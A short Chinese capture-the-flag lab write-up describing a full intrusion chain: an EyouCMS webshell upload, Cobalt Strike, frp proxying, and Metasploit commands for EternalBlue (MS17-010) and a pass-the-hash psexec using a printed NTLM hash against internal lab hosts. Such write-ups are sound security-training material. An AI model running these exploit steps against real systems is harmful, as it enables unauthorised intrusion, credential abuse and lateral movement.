Lab1_wp

由 rokki3 发布

VPN连接后初始探测

  • 连接 OpenVPN 后,发现目标使用 易优CMS 框架。

信息收集

  • 使用 fscan 工具进行信息收集。
  • 发现存在 ThinkPHP 5.0.23 的 RCE 漏洞,使用工具进行验证
  • 但无法getshell

易优CMS 漏洞利用

  • 网上搜索易优CMS相关漏洞,发现一个 Nday 漏洞,支持从前台 getshell。
  • 编写 POC,将一句话木马 使用 Base64 编码写入

木马连接

  • 使用 蚁剑(AntSword) 连接成功。
  • 找到第一个 flag

权限提升

  • 创建管理员用户,并打开 3389 远程桌面端口
  • 成功远程连接桌面,上线 Cobalt Strike

内网横向

  • 通过信息收集发现目标为 双网卡机器
  • 使用 fscan 对内网进行扫描,发现192.168.20.20的主机为域控
  • 配置 frp 内网代理。
  • 配置代理环境,进入 msfconsole

永恒之蓝(MS17-010)利用

  • 探测到目标存在 MS17-010 漏洞

  • 利用模块如下:

use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.20.30
set PAYLOAD windows/x64/meterpreter/bind_tcp  # 使用正向连接(目标在内网)
set LHOST 172.16.233.2  # 本机回连 IP(ifconfig 查看)
run

进行漏洞利用

得到第三个flag

PTH攻击

继续使用msf进行PTH攻击,得到第二个flag

use exploit/windows/smb/psexec
set RHOST 192.168.20.10
set SMBUser Administrator
set SMBPass 00000000000000000000000000000000:a167976f7bd8d93ee232fa7a87a4079e
run

0条评论

发表评论